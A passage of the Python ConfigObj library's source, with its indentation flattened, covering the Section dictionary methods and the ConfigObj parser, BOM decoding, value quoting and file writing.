If key is not found, d is returned if given, otherwise KeyError is raised'
"""
try:
val = self[key]
except KeyError:
if default is MISSING:
raise
val = default
else:
del self[key]
return val
def popitem(self):
"""Pops the first (key,val)"""
sequence = (self.scalars + self.sections)
if not sequence:
raise KeyError(": 'popitem(): dictionary is empty'")
key = sequence[0]
val = self[key]
del self[key]
return key, val
def clear(self):
"""
A version of clear that also affects scalars/sections
Also clears comments and configspec.
Leaves other attributes alone :
depth/main/parent are not affected
"""
dict.clear(self)
self.scalars = []
self.sections = []
self.comments = {}
self.inline_comments = {}
self.configspec = None
self.defaults = []
self.extra_values = []
def setdefault(self, key, default=None):
"""A version of setdefault that sets sequence if appropriate."""
try:
return self[key]
except KeyError:
self[key] = default
return self[key]
def items(self):
"""D.items() -> list of D's (key, value) pairs, as 2-tuples"""
return list(zip((self.scalars + self.sections), list(self.values())))
def keys(self):
"""D.keys() -> list of D's keys"""
return (self.scalars + self.sections)
def values(self):
"""D.values() -> list of D's values"""
return [self[key] for key in (self.scalars + self.sections)]
def iteritems(self):
"""D.iteritems() -> an iterator over the (key, value) items of D"""
return iter(list(self.items()))
def iterkeys(self):
"""D.iterkeys() -> an iterator over the keys of D"""
return iter((self.scalars + self.sections))
__iter__ = iterkeys
def itervalues(self):
"""D.itervalues() -> an iterator over the values of D"""
return iter(list(self.values()))
def __repr__(self):
"""x.__repr__() <==> repr(x)"""
def _getval(key):
try:
return self[key]
except MissingInterpolationOption:
return dict.__getitem__(self, key)
return '{%s}' % ', '.join([('%s: %s' % (repr(key), repr(_getval(key))))
for key in (self.scalars + self.sections)])
__str__ = __repr__
__str__.__doc__ = "x.__str__() <==> str(x)"
# Extra methods - not in a normal dictionary
def dict(self):
"""
Return a deepcopy of self as a dictionary.
All members that are ``Section`` instances are recursively turned to
ordinary dictionaries - by calling their ``dict`` method.
>>> n = a.dict()
>>> n == a
1
>>> n is a
0
"""
newdict = {}
for entry in self:
this_entry = self[entry]
if isinstance(this_entry, Section):
this_entry = this_entry.dict()
elif isinstance(this_entry, list):
# create a copy rather than a reference
this_entry = list(this_entry)
elif isinstance(this_entry, tuple):
# create a copy rather than a reference
this_entry = tuple(this_entry)
newdict[entry] = this_entry
return newdict
def merge(self, indict):
"""
A recursive update - useful for merging config files.
>>> a = '''[section1]
... option1 = True
... [[subsection]]
... more_options = False
... # end of file'''.splitlines()
>>> b = '''# File is user.ini
... [section1]
... option1 = False
... # end of file'''.splitlines()
>>> c1 = ConfigObj(b)
>>> c2 = ConfigObj(a)
>>> c2.merge(c1)
>>> c2
ConfigObj({'section1': {'option1': 'False', 'subsection': {'more_options': 'False'}}})
"""
for key, val in list(indict.items()):
if (key in self and isinstance(self[key], dict) and
isinstance(val, dict)):
self[key].merge(val)
else:
self[key] = val
def rename(self, oldkey, newkey):
"""
Change a keyname to another, without changing position in sequence.
Implemented so that transformations can be made on keys,
as well as on values. (used by encode and decode)
Also renames comments.
"""
if oldkey in self.scalars:
the_list = self.scalars
elif oldkey in self.sections:
the_list = self.sections
else:
raise KeyError('Key "%s" not found.' % oldkey)
pos = the_list.index(oldkey)
#
val = self[oldkey]
dict.__delitem__(self, oldkey)
dict.__setitem__(self, newkey, val)
the_list.remove(oldkey)
the_list.insert(pos, newkey)
comm = self.comments[oldkey]
inline_comment = self.inline_comments[oldkey]
del self.comments[oldkey]
del self.inline_comments[oldkey]
self.comments[newkey] = comm
self.inline_comments[newkey] = inline_comment
def walk(self, function, raise_errors=True,
call_on_sections=False, **keywargs):
"""
Walk every member and call a function on the keyword and value.
Return a dictionary of the return values
If the function raises an exception, raise the errror
unless ``raise_errors=False``, in which case set the return value to
``False``.
Any unrecognised keyword arguments you pass to walk, will be pased on
to the function you pass in.
Note: if ``call_on_sections`` is ``True`` then - on encountering a
subsection, *first* the function is called for the *whole* subsection,
and then recurses into it's members. This means your function must be
able to handle strings, dictionaries and lists. This allows you
to change the key of subsections as well as for ordinary members. The
return value when called on the whole subsection has to be discarded.
See the encode and decode methods for examples, including functions.
.. admonition:: caution
You can use ``walk`` to transform the names of members of a section
but you mustn't add or delete members.
>>> config = '''[XXXXsection]
... XXXXkey = XXXXvalue'''.splitlines()
>>> cfg = ConfigObj(config)
>>> cfg
ConfigObj({'XXXXsection': {'XXXXkey': 'XXXXvalue'}})
>>> def transform(section, key):
... val = section[key]
... newkey = key.replace('XXXX', 'CLIENT1')
... section.rename(key, newkey)
... if isinstance(val, (tuple, list, dict)):
... pass
... else:
... val = val.replace('XXXX', 'CLIENT1')
... section[newkey] = val
>>> cfg.walk(transform, call_on_sections=True)
{'CLIENT1section': {'CLIENT1key': None}}
>>> cfg
ConfigObj({'CLIENT1section': {'CLIENT1key': 'CLIENT1value'}})
"""
out = {}
# scalars first
for i in range(len(self.scalars)):
entry = self.scalars[i]
try:
val = function(self, entry, **keywargs)
# bound again in case name has changed
entry = self.scalars[i]
out[entry] = val
except Exception:
if raise_errors:
raise
else:
entry = self.scalars[i]
out[entry] = False
# then sections
for i in range(len(self.sections)):
entry = self.sections[i]
if call_on_sections:
try:
function(self, entry, **keywargs)
except Exception:
if raise_errors:
raise
else:
entry = self.sections[i]
out[entry] = False
# bound again in case name has changed
entry = self.sections[i]
# previous result is discarded
out[entry] = self[entry].walk(
function,
raise_errors=raise_errors,
call_on_sections=call_on_sections,
**keywargs)
return out
def as_bool(self, key):
"""
Accepts a key as input. The corresponding value must be a string or
the objects (``True`` or 1) or (``False`` or 0). We allow 0 and 1 to
retain compatibility with Python 2.2.
If the string is one of ``True``, ``On``, ``Yes``, or ``1`` it returns
``True``.
If the string is one of ``False``, ``Off``, ``No``, or ``0`` it returns
``False``.
``as_bool`` is not case sensitive.
Any other input will raise a ``ValueError``.
>>> a = ConfigObj()
>>> a['a'] = 'fish'
>>> a.as_bool('a')
Traceback (most recent call last):
ValueError: Value "fish" is neither True nor False
>>> a['b'] = 'True'
>>> a.as_bool('b')
1
>>> a['b'] = 'off'
>>> a.as_bool('b')
0
"""
val = self[key]
if val == True:
return True
elif val == False:
return False
else:
try:
if not isinstance(val, six.string_types):
# TODO: Why do we raise a KeyError here?
raise KeyError()
else:
return self.main._bools[val.lower()]
except KeyError:
raise ValueError('Value "%s" is neither True nor False' % val)
def as_int(self, key):
"""
A convenience method which coerces the specified value to an integer.
If the value is an invalid literal for ``int``, a ``ValueError`` will
be raised.
>>> a = ConfigObj()
>>> a['a'] = 'fish'
>>> a.as_int('a')
Traceback (most recent call last):
ValueError: invalid literal for int() with base 10: 'fish'
>>> a['b'] = '1'
>>> a.as_int('b')
1
>>> a['b'] = '3.2'
>>> a.as_int('b')
Traceback (most recent call last):
ValueError: invalid literal for int() with base 10: '3.2'
"""
return int(self[key])
def as_float(self, key):
"""
A convenience method which coerces the specified value to a float.
If the value is an invalid literal for ``float``, a ``ValueError`` will
be raised.
>>> a = ConfigObj()
>>> a['a'] = 'fish'
>>> a.as_float('a') #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
ValueError: invalid literal for float(): fish
>>> a['b'] = '1'
>>> a.as_float('b')
1.0
>>> a['b'] = '3.2'
>>> a.as_float('b') #doctest: +ELLIPSIS
3.2...
"""
return float(self[key])
def as_list(self, key):
"""
A convenience method which fetches the specified value, guaranteeing
that it is a list.
>>> a = ConfigObj()
>>> a['a'] = 1
>>> a.as_list('a')
[1]
>>> a['a'] = (1,)
>>> a.as_list('a')
[1]
>>> a['a'] = [1]
>>> a.as_list('a')
[1]
"""
result = self[key]
if isinstance(result, (tuple, list)):
return list(result)
return [result]
def restore_default(self, key):
"""
Restore (and return) default value for the specified key.
This method will only work for a ConfigObj that was created
with a configspec and has been validated.
If there is no default value for this key, ``KeyError`` is raised.
"""
default = self.default_values[key]
dict.__setitem__(self, key, default)
if key not in self.defaults:
self.defaults.append(key)
return default
def restore_defaults(self):
"""
Recursively restore default values to all members
that have them.
This method will only work for a ConfigObj that was created
with a configspec and has been validated.
It doesn't delete or modify entries without default values.
"""
for key in self.default_values:
self.restore_default(key)
for section in self.sections:
self[section].restore_defaults()
class ConfigObj(Section):
"""An object to read, create, and write config files."""
_keyword = re.compile(r'''^ # line start
(\s*) # indentation
( # keyword
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'"=].*?) # no quotes
)
\s*=\s* # divider
(.*) # value (including list values and comments)
$ # line end
''',
re.VERBOSE)
_sectionmarker = re.compile(r'''^
(\s*) # 1: indentation
((?:\[\s*)+) # 2: section marker open
( # 3: section name open
(?:"\s*\S.*?\s*")| # at least one non-space with double quotes
(?:'\s*\S.*?\s*')| # at least one non-space with single quotes
(?:[^'"\s].*?) # at least one non-space unquoted
) # section name close
((?:\s*\])+) # 4: section marker close
\s*(\#.*)? # 5: optional comment
$''',
re.VERBOSE)
# this regexp pulls list values out as a single string
# or single values and comments
# FIXME: this regex adds a '' to the end of comma terminated lists
# workaround in ``_handle_value``
_valueexp = re.compile(r'''^
(?:
(?:
(
(?:
(?:
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'",\#][^,\#]*?) # unquoted
)
\s*,\s* # comma
)* # match all list items ending in a comma (if any)
)
(
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'",\#\s][^,]*?)| # unquoted
(?:(?<!,)) # Empty value
)? # last item in a list - or string value
)|
(,) # alternatively a single comma - empty list
)
\s*(\#.*)? # optional comment
$''',
re.VERBOSE)
# use findall to get the members of a list value
_listvalueexp = re.compile(r'''
(
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'",\#]?.*?) # unquoted
)
\s*,\s* # comma
''',
re.VERBOSE)
# this regexp is used for the value
# when lists are switched off
_nolistvalue = re.compile(r'''^
(
(?:".*?")| # double quotes
(?:'.*?')| # single quotes
(?:[^'"\#].*?)| # unquoted
(?:) # Empty value
)
\s*(\#.*)? # optional comment
$''',
re.VERBOSE)
# regexes for finding triple quoted values on one line
_single_line_single = re.compile(r"^'''(.*?)'''\s*(#.*)?$")
_single_line_double = re.compile(r'^"""(.*?)"""\s*(#.*)?$')
_multi_line_single = re.compile(r"^(.*?)'''\s*(#.*)?$")
_multi_line_double = re.compile(r'^(.*?)"""\s*(#.*)?$')
_triple_quote = {
"'''": (_single_line_single, _multi_line_single),
'"""': (_single_line_double, _multi_line_double),
}
# Used by the ``istrue`` Section method
_bools = {
'yes': True, 'no': False,
'on': True, 'off': False,
'1': True, '0': False,
'true': True, 'false': False,
}
def __init__(self, infile=None, options=None, configspec=None, encoding=None,
interpolation=True, raise_errors=False, list_values=True,
create_empty=False, file_error=False, stringify=True,
indent_type=None, default_encoding=None, unrepr=False,
write_empty_values=False, _inspec=False):
"""
Parse a config file or create a config file object.
``ConfigObj(infile=None, configspec=None, encoding=None,
interpolation=True, raise_errors=False, list_values=True,
create_empty=False, file_error=False, stringify=True,
indent_type=None, default_encoding=None, unrepr=False,
write_empty_values=False, _inspec=False)``
"""
self._inspec = _inspec
# init the superclass
Section.__init__(self, self, 0, self)
infile = infile or []
_options = {'configspec': configspec,
'encoding': encoding, 'interpolation': interpolation,
'raise_errors': raise_errors, 'list_values': list_values,
'create_empty': create_empty, 'file_error': file_error,
'stringify': stringify, 'indent_type': indent_type,
'default_encoding': default_encoding, 'unrepr': unrepr,
'write_empty_values': write_empty_values}
if options is None:
options = _options
else:
import warnings
warnings.warn('Passing in an options dictionary to ConfigObj() is '
'deprecated. Use **options instead.',
DeprecationWarning, stacklevel=2)
# TODO: check the values too.
for entry in options:
if entry not in OPTION_DEFAULTS:
raise TypeError('Unrecognised option "%s".' % entry)
for entry, value in list(OPTION_DEFAULTS.items()):
if entry not in options:
options[entry] = value
keyword_value = _options[entry]
if value != keyword_value:
options[entry] = keyword_value
# XXXX this ignores an explicit list_values = True in combination
# with _inspec. The user should *never* do that anyway, but still...
if _inspec:
options['list_values'] = False
self._initialise(options)
configspec = options['configspec']
self._original_configspec = configspec
self._load(infile, configspec)
def _load(self, infile, configspec):
if isinstance(infile, six.string_types):
self.filename = infile
if os.path.isfile(infile):
with open(infile, 'rb') as h:
content = h.readlines() or []
elif self.file_error:
# raise an error if the file doesn't exist
raise IOError('Config file not found: "%s".' % self.filename)
else:
# file doesn't already exist
if self.create_empty:
# this is a good test that the filename specified
# isn't impossible - like on a non-existent device
with open(infile, 'w') as h:
h.write('')
content = []
elif isinstance(infile, (list, tuple)):
content = list(infile)
elif isinstance(infile, dict):
# initialise self
# the Section class handles creating subsections
if isinstance(infile, ConfigObj):
# get a copy of our ConfigObj
def set_section(in_section, this_section):
for entry in in_section.scalars:
this_section[entry] = in_section[entry]
for section in in_section.sections:
this_section[section] = {}
set_section(in_section[section], this_section[section])
set_section(infile, self)
else:
for entry in infile:
self[entry] = infile[entry]
del self._errors
if configspec is not None:
self._handle_configspec(configspec)
else:
self.configspec = None
return
elif getattr(infile, 'read', MISSING) is not MISSING:
# This supports file like objects
content = infile.read() or []
# needs splitting into lines - but needs doing *after* decoding
# in case it's not an 8 bit encoding
else:
raise TypeError('infile must be a filename, file like object, or list of lines.')
if content:
# don't do it for the empty ConfigObj
content = self._handle_bom(content)
# infile is now *always* a list
#
# Set the newlines attribute (first line ending it finds)
# and strip trailing '\n' or '\r' from lines
for line in content:
if (not line) or (line[-1] not in ('\r', '\n')):
continue
for end in ('\r\n', '\n', '\r'):
if line.endswith(end):
self.newlines = end
break
break
assert all(isinstance(line, six.string_types) for line in content), repr(content)
content = [line.rstrip('\r\n') for line in content]
self._parse(content)
# if we had any errors, now is the time to raise them
if self._errors:
info = "at line %s." % self._errors[0].line_number
if len(self._errors) > 1:
msg = "Parsing failed with several errors.\nFirst error %s" % info
error = ConfigObjError(msg)
else:
error = self._errors[0]
# set the errors attribute; it's a list of tuples:
# (error_type, message, line_number)
error.errors = self._errors
# set the config attribute
error.config = self
raise error
# delete private attributes
del self._errors
if configspec is None:
self.configspec = None
else:
self._handle_configspec(configspec)
def _initialise(self, options=None):
if options is None:
options = OPTION_DEFAULTS
# initialise a few variables
self.filename = None
self._errors = []
self.raise_errors = options['raise_errors']
self.interpolation = options['interpolation']
self.list_values = options['list_values']
self.create_empty = options['create_empty']
self.file_error = options['file_error']
self.stringify = options['stringify']
self.indent_type = options['indent_type']
self.encoding = options['encoding']
self.default_encoding = options['default_encoding']
self.BOM = False
self.newlines = None
self.write_empty_values = options['write_empty_values']
self.unrepr = options['unrepr']
self.initial_comment = []
self.final_comment = []
self.configspec = None
if self._inspec:
self.list_values = False
# Clear section attributes as well
Section._initialise(self)
def __repr__(self):
def _getval(key):
try:
return self[key]
except MissingInterpolationOption:
return dict.__getitem__(self, key)
return ('ConfigObj({%s})' %
', '.join([('%s: %s' % (repr(key), repr(_getval(key))))
for key in (self.scalars + self.sections)]))
def _handle_bom(self, infile):
"""
Handle any BOM, and decode if necessary.
If an encoding is specified, that *must* be used - but the BOM should
still be removed (and the BOM attribute set).
(If the encoding is wrongly specified, then a BOM for an alternative
encoding won't be discovered or removed.)
If an encoding is not specified, UTF8 or UTF16 BOM will be detected and
removed. The BOM attribute will be set. UTF16 will be decoded to
unicode.
NOTE: This method must not be called with an empty ``infile``.
Specifying the *wrong* encoding is likely to cause a
``UnicodeDecodeError``.
``infile`` must always be returned as a list of lines, but may be
passed in as a single string.
"""
if ((self.encoding is not None) and
(self.encoding.lower() not in BOM_LIST)):
# No need to check for a BOM
# the encoding specified doesn't have one
# just decode
return self._decode(infile, self.encoding)
if isinstance(infile, (list, tuple)):
line = infile[0]
else:
line = infile
if isinstance(line, six.text_type):
# it's already decoded and there's no need to do anything
# else, just use the _decode utility method to handle
# listifying appropriately
return self._decode(infile, self.encoding)
if self.encoding is not None:
# encoding explicitly supplied
# And it could have an associated BOM
# TODO: if encoding is just UTF16 - we ought to check for both
# TODO: big endian and little endian versions.
enc = BOM_LIST[self.encoding.lower()]
if enc == 'utf_16':
# For UTF16 we try big endian and little endian
for BOM, (encoding, final_encoding) in list(BOMS.items()):
if not final_encoding:
# skip UTF8
continue
if infile.startswith(BOM):
### BOM discovered
##self.BOM = True
# Don't need to remove BOM
return self._decode(infile, encoding)
# If we get this far, will *probably* raise a DecodeError
# As it doesn't appear to start with a BOM
return self._decode(infile, self.encoding)
# Must be UTF8
BOM = BOM_SET[enc]
if not line.startswith(BOM):
return self._decode(infile, self.encoding)
newline = line[len(BOM):]
# BOM removed
if isinstance(infile, (list, tuple)):
infile[0] = newline
else:
infile = newline
self.BOM = True
return self._decode(infile, self.encoding)
# No encoding specified - so we need to check for UTF8/UTF16
for BOM, (encoding, final_encoding) in list(BOMS.items()):
if not isinstance(line, six.binary_type) or not line.startswith(BOM):
# didn't specify a BOM, or it's not a bytestring
continue
else:
# BOM discovered
self.encoding = final_encoding
if not final_encoding:
self.BOM = True
# UTF8
# remove BOM
newline = line[len(BOM):]
if isinstance(infile, (list, tuple)):
infile[0] = newline
else:
infile = newline
# UTF-8
if isinstance(infile, six.text_type):
return infile.splitlines(True)
elif isinstance(infile, six.binary_type):
return infile.decode('utf-8').splitlines(True)
else:
return self._decode(infile, 'utf-8')
# UTF16 - have to decode
return self._decode(infile, encoding)
if six.PY2 and isinstance(line, str):
# don't actually do any decoding, since we're on python 2 and
# returning a bytestring is fine
return self._decode(infile, None)
# No BOM discovered and no encoding specified, default to UTF-8
if isinstance(infile, six.binary_type):
return infile.decode('utf-8').splitlines(True)
else:
return self._decode(infile, 'utf-8')
def _a_to_u(self, aString):
"""Decode ASCII strings to unicode if a self.encoding is specified."""
if isinstance(aString, six.binary_type) and self.encoding:
return aString.decode(self.encoding)
else:
return aString
def _decode(self, infile, encoding):
"""
Decode infile to unicode. Using the specified encoding.
if is a string, it also needs converting to a list.
"""
if isinstance(infile, six.string_types):
return infile.splitlines(True)
if isinstance(infile, six.binary_type):
# NOTE: Could raise a ``UnicodeDecodeError``
if encoding:
return infile.decode(encoding).splitlines(True)
else:
return infile.splitlines(True)
if encoding:
for i, line in enumerate(infile):
if isinstance(line, six.binary_type):
# NOTE: The isinstance test here handles mixed lists of unicode/string
# NOTE: But the decode will break on any non-string values
# NOTE: Or could raise a ``UnicodeDecodeError``
infile[i] = line.decode(encoding)
return infile
def _decode_element(self, line):
"""Decode element to unicode if necessary."""
if isinstance(line, six.binary_type) and self.default_encoding:
return line.decode(self.default_encoding)
else:
return line
# TODO: this may need to be modified
def _str(self, value):
"""
Used by ``stringify`` within validate, to turn non-string values
into strings.
"""
if not isinstance(value, six.string_types):
# intentially 'str' because it's just whatever the "normal"
# string type is for the python version we're dealing with
return str(value)
else:
return value
def _parse(self, infile):
"""Actually parse the config file."""
temp_list_values = self.list_values
if self.unrepr:
self.list_values = False
comment_list = []
done_start = False
this_section = self
maxline = len(infile) - 1
cur_index = -1
reset_comment = False
while cur_index < maxline:
if reset_comment:
comment_list = []
cur_index += 1
line = infile[cur_index]
sline = line.strip()
# do we have anything on the line ?
if not sline or sline.startswith('#'):
reset_comment = False
comment_list.append(line)
continue
if not done_start:
# preserve initial comment
self.initial_comment = comment_list
comment_list = []
done_start = True
reset_comment = True
# first we check if it's a section marker
mat = self._sectionmarker.match(line)
if mat is not None:
# is a section line
(indent, sect_open, sect_name, sect_close, comment) = mat.groups()
if indent and (self.indent_type is None):
self.indent_type = indent
cur_depth = sect_open.count('[')
if cur_depth != sect_close.count(']'):
self._handle_error("Cannot compute the section depth",
NestingError, infile, cur_index)
continue
if cur_depth < this_section.depth:
# the new section is dropping back to a previous level
try:
parent = self._match_depth(this_section,
cur_depth).parent
except SyntaxError:
self._handle_error("Cannot compute nesting level",
NestingError, infile, cur_index)
continue
elif cur_depth == this_section.depth:
# the new section is a sibling of the current section
parent = this_section.parent
elif cur_depth == this_section.depth + 1:
# the new section is a child the current section
parent = this_section
else:
self._handle_error("Section too nested",
NestingError, infile, cur_index)
continue
sect_name = self._unquote(sect_name)
if sect_name in parent:
self._handle_error('Duplicate section name',
DuplicateError, infile, cur_index)
continue
# create the new section
this_section = Section(
parent,
cur_depth,
self,
name=sect_name)
parent[sect_name] = this_section
parent.inline_comments[sect_name] = comment
parent.comments[sect_name] = comment_list
continue
#
# it's not a section marker,
# so it should be a valid ``key = value`` line
mat = self._keyword.match(line)
if mat is None:
self._handle_error(
'Invalid line ({0!r}) (matched as neither section nor keyword)'.format(line),
ParseError, infile, cur_index)
else:
# is a keyword value
# value will include any inline comment
(indent, key, value) = mat.groups()
if indent and (self.indent_type is None):
self.indent_type = indent
# check for a multiline value
if value[:3] in ['"""', "'''"]:
try:
value, comment, cur_index = self._multiline(
value, infile, cur_index, maxline)
except SyntaxError:
self._handle_error(
'Parse error in multiline value',
ParseError, infile, cur_index)
continue
else:
if self.unrepr:
comment = ''
try:
value = unrepr(value)
except Exception as e:
if type(e) == UnknownType:
msg = 'Unknown name or type in value'
else:
msg = 'Parse error from unrepr-ing multiline value'
self._handle_error(msg, UnreprError, infile,
cur_index)
continue
else:
if self.unrepr:
comment = ''
try:
value = unrepr(value)
except Exception as e:
if isinstance(e, UnknownType):
msg = 'Unknown name or type in value'
else:
msg = 'Parse error from unrepr-ing value'
self._handle_error(msg, UnreprError, infile,
cur_index)
continue
else:
# extract comment and lists
try:
(value, comment) = self._handle_value(value)
except SyntaxError:
self._handle_error(
'Parse error in value',
ParseError, infile, cur_index)
continue
#
key = self._unquote(key)
if key in this_section:
self._handle_error(
'Duplicate keyword name',
DuplicateError, infile, cur_index)
continue
# add the key.
# we set unrepr because if we have got this far we will never
# be creating a new section
this_section.__setitem__(key, value, unrepr=True)
this_section.inline_comments[key] = comment
this_section.comments[key] = comment_list
continue
#
if self.indent_type is None:
# no indentation used, set the type accordingly
self.indent_type = ''
# preserve the final comment
if not self and not self.initial_comment:
self.initial_comment = comment_list
elif not reset_comment:
self.final_comment = comment_list
self.list_values = temp_list_values
def _match_depth(self, sect, depth):
"""
Given a section and a depth level, walk back through the sections
parents to see if the depth level matches a previous section.
Return a reference to the right section,
or raise a SyntaxError.
"""
while depth < sect.depth:
if sect is sect.parent:
# we've reached the top level already
raise SyntaxError()
sect = sect.parent
if sect.depth == depth:
return sect
# shouldn't get here
raise SyntaxError()
def _handle_error(self, text, ErrorClass, infile, cur_index):
"""
Handle an error according to the error settings.
Either raise the error or store it.
The error will have occured at ``cur_index``
"""
line = infile[cur_index]
cur_index += 1
message = '{0} at line {1}.'.format(text, cur_index)
error = ErrorClass(message, cur_index, line)
if self.raise_errors:
# raise the error - parsing stops here
raise error
# store the error
# reraise when parsing has finished
self._errors.append(error)
def _unquote(self, value):
"""Return an unquoted version of a value"""
if not value:
# should only happen during parsing of lists
raise SyntaxError
if (value[0] == value[-1]) and (value[0] in ('"', "'")):
value = value[1:-1]
return value
def _quote(self, value, multiline=True):
"""
Return a safely quoted version of a value.
Raise a ConfigObjError if the value cannot be safely quoted.
If multiline is ``True`` (default) then use triple quotes
if necessary.
* Don't quote values that don't need it.
* Recursively quote members of a list and return a comma joined list.
* Multiline is ``False`` for lists.
* Obey list syntax for empty and single member lists.
If ``list_values=False`` then the value is only quoted if it contains
a ``\\n`` (is multiline) or '#'.
If ``write_empty_values`` is set, and the value is an empty string, it
won't be quoted.
"""
if multiline and self.write_empty_values and value == '':
# Only if multiline is set, so that it is used for values not
# keys, and not values that are part of a list
return ''
if multiline and isinstance(value, (list, tuple)):
if not value:
return ','
elif len(value) == 1:
return self._quote(value[0], multiline=False) + ','
return ', '.join([self._quote(val, multiline=False)
for val in value])
if not isinstance(value, six.string_types):
if self.stringify:
# intentially 'str' because it's just whatever the "normal"
# string type is for the python version we're dealing with
value = str(value)
else:
raise TypeError('Value "%s" is not a string.' % value)
if not value:
return '""'
no_lists_no_quotes = not self.list_values and '\n' not in value and '#' not in value
need_triple = multiline and ((("'" in value) and ('"' in value)) or ('\n' in value ))
hash_triple_quote = multiline and not need_triple and ("'" in value) and ('"' in value) and ('#' in value)
check_for_single = (no_lists_no_quotes or not need_triple) and not hash_triple_quote
if check_for_single:
if not self.list_values:
# we don't quote if ``list_values=False``
quot = noquot
# for normal values either single or double quotes will do
elif '\n' in value:
# will only happen if multiline is off - e.g. '\n' in key
raise ConfigObjError('Value "%s" cannot be safely quoted.' % value)
elif ((value[0] not in wspace_plus) and
(value[-1] not in wspace_plus) and
(',' not in value)):
quot = noquot
else:
quot = self._get_single_quote(value)
else:
# if value has '\n' or "'" *and* '"', it will need triple quotes
quot = self._get_triple_quote(value)
if quot == noquot and '#' in value and self.list_values:
quot = self._get_single_quote(value)
return quot % value
def _get_single_quote(self, value):
if ("'" in value) and ('"' in value):
raise ConfigObjError('Value "%s" cannot be safely quoted.' % value)
elif '"' in value:
quot = squot
else:
quot = dquot
return quot
def _get_triple_quote(self, value):
if (value.find('"""') != -1) and (value.find("'''") != -1):
raise ConfigObjError('Value "%s" cannot be safely quoted.' % value)
if value.find('"""') == -1:
quot = tdquot
else:
quot = tsquot
return quot
def _handle_value(self, value):
"""
Given a value string, unquote, remove comment,
handle lists. (including empty and single member lists)
"""
if self._inspec:
# Parsing a configspec so don't handle comments
return (value, '')
# do we look for lists in values ?
if not self.list_values:
mat = self._nolistvalue.match(value)
if mat is None:
raise SyntaxError()
# NOTE: we don't unquote here
return mat.groups()
#
mat = self._valueexp.match(value)
if mat is None:
# the value is badly constructed, probably badly quoted,
# or an invalid list
raise SyntaxError()
(list_values, single, empty_list, comment) = mat.groups()
if (list_values == '') and (single is None):
# change this if you want to accept empty values
raise SyntaxError()
# NOTE: note there is no error handling from here if the regex
# is wrong: then incorrect values will slip through
if empty_list is not None:
# the single comma - meaning an empty list
return ([], comment)
if single is not None:
# handle empty values
if list_values and not single:
# FIXME: the '' is a workaround because our regex now matches
# '' at the end of a list if it has a trailing comma
single = None
else:
single = single or '""'
single = self._unquote(single)
if list_values == '':
# not a list value
return (single, comment)
the_list = self._listvalueexp.findall(list_values)
the_list = [self._unquote(val) for val in the_list]
if single is not None:
the_list += [single]
return (the_list, comment)
def _multiline(self, value, infile, cur_index, maxline):
"""Extract the value, where we are in a multiline situation."""
quot = value[:3]
newvalue = value[3:]
single_line = self._triple_quote[quot][0]
multi_line = self._triple_quote[quot][1]
mat = single_line.match(value)
if mat is not None:
retval = list(mat.groups())
retval.append(cur_index)
return retval
elif newvalue.find(quot) != -1:
# somehow the triple quote is missing
raise SyntaxError()
#
while cur_index < maxline:
cur_index += 1
newvalue += '\n'
line = infile[cur_index]
if line.find(quot) == -1:
newvalue += line
else:
# end of multiline, process it
break
else:
# we've got to the end of the config, oops...
raise SyntaxError()
mat = multi_line.match(line)
if mat is None:
# a badly formed line
raise SyntaxError()
(value, comment) = mat.groups()
return (newvalue + value, comment, cur_index)
def _handle_configspec(self, configspec):
"""Parse the configspec."""
# FIXME: Should we check that the configspec was created with the
# correct settings ? (i.e. ``list_values=False``)
if not isinstance(configspec, ConfigObj):
try:
configspec = ConfigObj(configspec,
raise_errors=True,
file_error=True,
_inspec=True)
except ConfigObjError as e:
# FIXME: Should these errors have a reference
# to the already parsed ConfigObj ?
raise ConfigspecError('Parsing configspec failed: %s' % e)
except IOError as e:
raise IOError('Reading configspec failed: %s' % e)
self.configspec = configspec
def _set_configspec(self, section, copy):
"""
Called by validate. Handles setting the configspec on subsections
including sections to be validated by __many__
"""
configspec = section.configspec
many = configspec.get('__many__')
if isinstance(many, dict):
for entry in section.sections:
if entry not in configspec:
section[entry].configspec = many
for entry in configspec.sections:
if entry == '__many__':
continue
if entry not in section:
section[entry] = {}
section[entry]._created = True
if copy:
# copy comments
section.comments[entry] = configspec.comments.get(entry, [])
section.inline_comments[entry] = configspec.inline_comments.get(entry, '')
# Could be a scalar when we expect a section
if isinstance(section[entry], Section):
section[entry].configspec = configspec[entry]
def _write_line(self, indent_string, entry, this_entry, comment):
"""Write an individual line, for the write method"""
# NOTE: the calls to self._quote here handles non-StringType values.
if not self.unrepr:
val = self._decode_element(self._quote(this_entry))
else:
val = repr(this_entry)
return '%s%s%s%s%s' % (indent_string,
self._decode_element(self._quote(entry, multiline=False)),
self._a_to_u(' = '),
val,
self._decode_element(comment))
def _write_marker(self, indent_string, depth, entry, comment):
"""Write a section marker line"""
return '%s%s%s%s%s' % (indent_string,
self._a_to_u('[' * depth),
self._quote(self._decode_element(entry), multiline=False),
self._a_to_u(']' * depth),
self._decode_element(comment))
def _handle_comment(self, comment):
"""Deal with a comment."""
if not comment:
return ''
start = self.indent_type
if not comment.startswith('#'):
start += self._a_to_u(' # ')
return (start + comment)
# Public methods
def write(self, outfile=None, section=None):
"""
Write the current ConfigObj as a file
tekNico: FIXME: use StringIO instead of real files
>>> filename = a.filename
>>> a.filename = 'test.ini'
>>> a.write()
>>> a.filename = filename
>>> a == ConfigObj('test.ini', raise_errors=True)
1
>>> import os
>>> os.remove('test.ini')
"""
if self.indent_type is None:
# this can be true if initialised from a dictionary
self.indent_type = DEFAULT_INDENT_TYPE
out = []
cs = self._a_to_u('#')
csp = self._a_to_u('# ')
if section is None:
int_val = self.interpolation
self.interpolation = False
section = self
for line in self.initial_comment:
line = self._decode_element(line)
stripped_line = line.strip()
if stripped_line and not stripped_line.startswith(cs):
line = csp + line
out.append(line)
indent_string = self.indent_type * section.depth
for entry in (section.scalars + section.sections):
if entry in section.defaults:
# don't write out default values
continue
for comment_line in section.comments[entry]:
comment_line = self._decode_element(comment_line.lstrip())
if comment_line and not comment_line.startswith(cs):
comment_line = csp + comment_line
out.append(indent_string + comment_line)
this_entry = section[entry]
comment = self._handle_comment(section.inline_comments[entry])
if isinstance(this_entry, Section):
# a section
out.append(self._write_marker(
indent_string,
this_entry.depth,
entry,
comment))
out.extend(self.write(section=this_entry))
else:
out.append(self._write_line(
indent_string,
entry,
this_entry,
comment))
if section is self:
for line in self.final_comment:
